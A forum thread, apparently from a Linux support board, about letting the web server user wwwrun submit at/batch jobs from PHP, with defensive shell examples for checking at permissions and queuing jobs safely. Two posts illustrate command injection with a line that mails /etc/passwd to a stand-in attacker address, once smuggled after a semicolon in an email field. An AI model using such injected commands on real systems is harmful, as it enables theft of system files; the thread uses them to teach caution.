
Thread: user wwwrun prevented from running batch

  1. #1

    Question user wwwrun prevented from running batch

    I want to run a Web service that performs a lengthy calculation for the customer. If I let PHP perform the calculation, the script gets killed by server timeout. So I figured out it should initiate a batch job. However, the HTTP server process cannot initiate a batch job because user wwwrun is denied access to service at. Why is that so, and is it safe to remove this denial?

  2. #2

    Default Re: user wwwrun prevented from running batch

    Check if wwwrun is mentioned in /etc/at.deny. If so, removing it from that file will allow PHP to submit batch jobs. Apparmor may also impose restrictions if you have it running.
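An added example, not part of the original post: a shell check of whether an account may submit at/batch jobs, following the at.allow/at.deny precedence documented in at(1). It shows that removing wwwrun from /etc/at.deny has no effect when /etc/at.allow exists and does not list it. The function names and optional file arguments are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: decide whether USER may submit at/batch jobs, following the
# precedence documented in at(1).
# usage: at_allowed USER [ALLOW_FILE] [DENY_FILE]
at_allowed() {
    user=$1
    allow=${2:-/etc/at.allow}
    deny=${3:-/etc/at.deny}
    # The superuser may always use at.
    [ "$user" = root ] && return 0
    # If at.allow exists, it alone decides; at.deny is not consulted.
    if [ -e "$allow" ]; then
        grep -qxF -- "$user" "$allow"
        return
    fi
    # Otherwise every user not named in at.deny is allowed.
    if [ -e "$deny" ]; then
        ! grep -qxF -- "$user" "$deny"
        return
    fi
    # Neither file exists: only the superuser is allowed.
    return 1
}

# report USER: print the effective decision for the live system files.
report() {
    if at_allowed "$1"; then echo "$1: may use at/batch"
    else echo "$1: denied"; fi
}
report wwwrun
```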

  3. #3

    Question Re: user wwwrun prevented from running batch

    User wwwrun is listed in at.deny and I can remove it from there. However, I would like to know why it is the default setting and whether it is safe to remove it. Surely the maintainer who took the trouble to list wwwrun in at.deny had something in mind when he did that, didn’t he? Since I cannot reproduce his reasoning, I kindly ask you for a hint.

  4. #4

    Default Re: user wwwrun prevented from running batch

    Quote Originally Posted by yecril71pl
    User wwwrun is listed in at.deny and I can remove it from there. However, I would like to know why it is the default setting and whether it is safe to remove it. Surely the maintainer who took the trouble to list wwwrun in at.deny had something in mind when he did that, didn’t he? Since I cannot reproduce his reasoning, I kindly ask you for a hint.
    If someone hacks your webserver somehow, he/she would be able to use at.
    It would be even better to not have at installed at all (on a webserver).

  5. #5

    Default Re: user wwwrun prevented from running batch

    The reasoning is that it's better to be safe than sorry. At is generally meant to be used by interactive accounts. If you have a need to use at from a system account, then you had better understand the risk involved. In other words, if you can't understand the reasoning, then perhaps you should learn why before you enable it.

    Let me give you a scenario. Suppose you somehow are silly enough to forget to sanitise user input and incorporate some input as part of a command that is sent to at. And suppose that user input was something like mail -s jackpot badguy@evilsite.com < /etc/passwd. Do you get the idea?

    You have to learn to think paranoid when it comes to security.

  6. #6

    Question Re: user wwwrun prevented from running batch

    Quote Originally Posted by herbwahn
    It would be even better to not have at installed at all (on a webserver).
    But then I would be unable to run a batch job, and accordingly, to perform the task at hand? That would void the purpose of my server.

  7. #7

    Default Re: user wwwrun prevented from running batch

    Quote Originally Posted by ken_yap
    Let me give you a scenario. Suppose you somehow are silly enough to forget to sanitise user input and incorporate some input as part of a command that is sent to at. And suppose that user input was something like mail -s jackpot badguy@evilsite.com < /etc/passwd. Do you get the idea?
    Like somebody gives his e-mail address like this?
    badguy@evilsite.com;mail -s jackpot badguy@evilsite.com < /etc/passwd
    Quite an idea. Well, I have already been criticized here for using paranoid quotes in scripts…

    Is it better to enable user wwwrun or to call a setuid executable from PHP?
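An added example, not part of the original posts: one way for the web-facing script to queue work for batch so that request data never becomes part of the command text that at hands to /bin/sh, which is the failure the scenario above describes. The spool directory, worker path, queue cap and function names are hypothetical; the address travels in a file and the queued command is fixed.

```shell
#!/bin/sh
# Added example: queue a fixed command for batch; request data never enters
# the text that at/batch hands to /bin/sh.
SPOOL=${SPOOL:-/var/spool/calcjobs}   # hypothetical spool dir, fixed path without spaces
WORKER=/usr/local/bin/run-calc        # hypothetical worker that reads a .req file
MAX_PENDING=${MAX_PENDING:-20}        # assumed cap against queue flooding

valid_email() {
    # Reject any byte outside the allow-list first. This also catches
    # newlines, which a line-based grep alone would let through.
    case $1 in
        ''|*[!A-Za-z0-9@._+-]*) return 1 ;;
    esac
    printf '%s\n' "$1" |
        grep -Eq '^[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$'
}

pending_jobs() {
    # Count request files still waiting in the spool directory.
    find "$SPOOL" -maxdepth 1 -type f -name '*.req' | wc -l | tr -d ' '
}

# make_job EMAIL: store the request, print the command line to feed to batch.
make_job() {
    valid_email "$1" || { echo "rejected: invalid address" >&2; return 1; }
    [ "$(pending_jobs)" -lt "$MAX_PENDING" ] ||
        { echo "rejected: queue full" >&2; return 2; }
    id=$(od -An -N8 -tx1 /dev/urandom | tr -d ' \n')   # server-generated name
    ( umask 077; printf '%s\n' "$1" > "$SPOOL/$id.req" ) || return 3
    printf '%s %s\n' "$WORKER" "$SPOOL/$id.req"
}

# Intended use by the web-facing script (batch is not invoked in this sketch):
#   job=$(make_job "$address") && printf '%s\n' "$job" | batch
```

The worker is expected to delete its .req file when it finishes, so the pending count reflects jobs still queued.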

  8. #8

    Default Re: user wwwrun prevented from running batch

    You'll have to learn to evaluate the risks yourself. List in your head or on a piece of paper what the worst thing is that could happen if something went wrong with the feature you propose to enable. Ask a friend to play adversary and propose bad scenarios for the feature.

    For example if I were an adversary, I would ask: Is your setuid script accessible to normal users? Is it accessible to other web applications? What would happen if someone were to run it interactively? Does it accept any input or arguments? What would happen if some evil input were fed to it? What would happen if even though it could only run one thing, yet somebody can create a denial of service by queuing up too many batch jobs? And so forth.

  9. #9

    Default Re: user wwwrun prevented from running batch

    I want to run a Web service that performs a lengthy calculation for the customer.
    Can you just make a call to this process and then send it to the background instead of messing with at?

    Good luck,
    Hiatt

  10. #10

    Exclamation Re: user wwwrun prevented from running batch

    Quote Originally Posted by jthiatt08
    Can you just make a call to this process and then send it to the background instead of messing with at?
    This would make an easy DOS; I need at to manage the jobs. The system does not support running them in parallel.
    Last edited by yecril71pl; 12-May-2011 at 09:12. Reason: better wording
